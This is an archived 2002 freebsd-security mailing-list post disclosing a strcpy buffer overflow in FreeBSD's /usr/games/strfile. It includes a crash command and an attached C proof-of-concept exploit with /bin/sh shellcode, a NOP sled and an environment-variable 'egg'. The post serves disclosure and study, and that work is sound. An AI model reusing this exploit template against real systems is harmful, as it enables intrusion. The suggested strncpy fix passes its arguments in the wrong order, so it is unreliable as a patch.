From owner-freebsd-security Sun May 5 14:33:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from uadvg134.mx.net (uadvg134.mx.net [165.212.11.134]) by hub.freebsd.org (Postfix) with SMTP id CA92337B412 for ; Sun, 5 May 2002 14:33:19 -0700 (PDT) Received: (qmail 1756 invoked from network); 5 May 2002 21:33:31 -0000 Received: from uadvg133.cms.usa.net (165.212.11.133) by corprelay.cms.usa.net with SMTP; 5 May 2002 21:33:31 -0000 Received: USA.NET MXFirewall, messaging filters applied; Sun, 05 May 2002 21:33:25 GMT Received: from uwdvg007.cms.usa.net [165.212.8.7] by uadvg133.cms.usa.net via mtad (CM.1201.1.04A) with ESMTP id 832geeVhV0499M33; Sun, 05 May 2002 21:33:22 GMT Message-ID: <20020505213314.8762.qmail@uwdvg007.cms.usa.net> Received: from 192.115.8.147 [192.115.8.147] by uwdvg007.cms.usa.net (USANET web-mailer CM.0402.1.01C); Sun, 05 May 2002 21:33:14 -0000 Date: Sun, 05 May 2002 22:33:14 +0100 From: ReDeeMeR To: Subject: Buffer overflow in /usr/games/strfile X-Mailer: USANET web-mailer (CM.0402.1.01C) Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----NetAddressPart-00--=_eVho8912S073041adfc" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------NetAddressPart-00--=_eVho8912S073041adfc Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Hi, Below is an advisory for a vulnerable buffer in the /usr/games/strfile bi= nary which can be overflowed. I emailed this information to security-officer@freebsd.org on 28/04/02 and am yet to receive a reply. T= he reason I am posting this so early is that it is not really a major securi= ty risk (the binary file in question is not suid), but it is a practice of b= ad coding so I felt it my duty to make you aware of it. Also find attached my proof of concept code. Thanks, -ReDeeMeR- --begin paste-- -=3D[ g0tr00t.net advisory ]=3D- FreeBSD /usr/games/strfile buffer overflow ReDeeMeR (redeemer@g0tr00t.net) http://www.g0tr00t.net http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt -=3D[ Date discovered ]=3D- 24/04/02 -=3D[ Discovered by ]=3D- ReDeeMeR (redeemer@g0tr00t.net) -=3D[ Outline ]=3D- = = FreeBSD /usr/games/strfile contains a vulnerable buffer which can be overflowed. The games package is NOT installed by default. The strfile binary is NOT suid (4755), thus, the security risk here is no= t great. -=3D[ Impact ]=3D- No extra privileges can be gained. -=3D[ Affected ]=3D- Successfully tested on FreeBSD4.5-RELEASE, suspected vulnerability on ALL= FreeBSD machines which ship this software. -=3D[ Vendor Status ]=3D- FreeBSD (http://www.freebsd.org) contacted on 28/04/02 No reply after 7 days, so released this advisory due to the fact that thi= s is not a major = security issue. Advisory released on 05/05/02 -=3D[ Description ]=3D- /usr/games/strfile ("strfile" hereafter) is vulnerable to a standard buff= er overflow. The problem exists due to insufficient checking procedures on command lin= e input. The = vulnerability exists in a poorly utilised strcpy() function (found on lin= e 310 of strfile.c) which reads from an unchecked buffer: (void) strcpy(Outfile, *argv); Thus, a large input (greater than allocated buffer space) will cause strf= ile to segfault. This in turn can lead to the execution of arbitrary commands. A user can cause strfile to crash by inputting a string of length equal t= o or greater = than 1069 bytes, and an input of equal to or greater than 1088 bytes in l= ength will cause the eip of strcpy() to be overwritten with our input. This can be further investigated with the use of gdb, although I am not going to paste gdb output in this advisory. To reproduce this bug, execute the following command: FreeBSD$ /usr/games/strfile `perl -e 'print "A" x 1069'` -=3D[ Proof of concept ]=3D- Proof of concept code can be located at: = http://bse.die.ms/~redeemer/releases/ReDeeMeR/exploits/strfilexp.c If the program is successfully exploited, the terminal output should look= something like this: bash-2.05a$ uname -a FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sat Apr 20 14:14:37 BST 2002 = redeemer@:/usr/src/sys/compile/TOX i386 bash-2.05a$ id uid=3D31337(redeemer) gid=3D31337(redeemer) groups=3D31337(redeemer), 0(w= heel) bash-2.05a$ ./strfilexp ReDeeMeR's proof of concept code for /usr/games/strfile Using return addr: 0xbfbffb0c Buffer size: 2000 $ id uid=3D31337(redeemer) gid=3D31337(redeemer) groups=3D31337(redeemer), 0(w= heel) $ *Notice that no extra privileges have been gained (due to strfile NOT bei= ng suid)* -=3D[ Fix ]=3D- A suggested fix was sent by me to FreeBSD to use strncpy() instead of strcpy(). Replace (void) strcpy(Outfile, *argv); with: (void) strncpy(Outfile, sizeof(Outfile), *argv); FreeBSD are yet to respond to my e-mail, but I will assume that they rece= ived it and have implemented an update in strfile.c within the FreeBSD-current branch. -=3D[ Greets ]=3D- Thanks to: The Itch - For various mentoring and for hosting g0tr00t.net. keoki - Someone to collaborate/compete with. Chawmp - " " " " " Greets: #g0tr00t, #ch0wn, #Turbo-IRC, #NeXT. --end paste-- ------NetAddressPart-00--=_eVho8912S073041adfc Content-Type: text/plain; name="strfilexp.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="strfilexp.c" /* Proof of concept code for /usr/games/strfile [28/04/02] * Does not gain root shell, merely a proof of concept code * Tested on FreeBSD4.5-RELEASE * Find the advisory at * http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt * * redeemer@g0tr00t.net * http://www.g0tr00t.net * http://bse.die.ms/~redeemer/legal.shtml applies to this file. */ #include #include #include #define MOO 2000 /* RET size */ #define LEN 2048 /* EGG zie */ #define NOP 0x90 /* FreeBSD execve shellcode */ char shellcode[]= "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" "\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" "\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" "/bin/sh"; int main(void) { char *buff, *egg, *ptr; long *addr_pointer, addr; int bsize = MOO, eggsize = LEN, get_sp = (int)&get_sp, i; buff = malloc(bsize); egg = malloc(eggsize); printf("ReDeeMeR's proof of concept code for /usr/games/strfile\n"); printf("Using return addr: \t0x%x\n", get_sp); printf("Buffer size: \t\t%d\n", bsize); ptr = buff; addr_pointer = (long *)ptr; for (i = 0; i < bsize; i += 4 ) { *(addr_pointer++) = get_sp; } ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) { *(ptr++) = NOP; } for (i = 0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); execl("/usr/games/strfile", "strfile", buff, NULL); return(0); } /* EOF */ ------NetAddressPart-00--=_eVho8912S073041adfc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message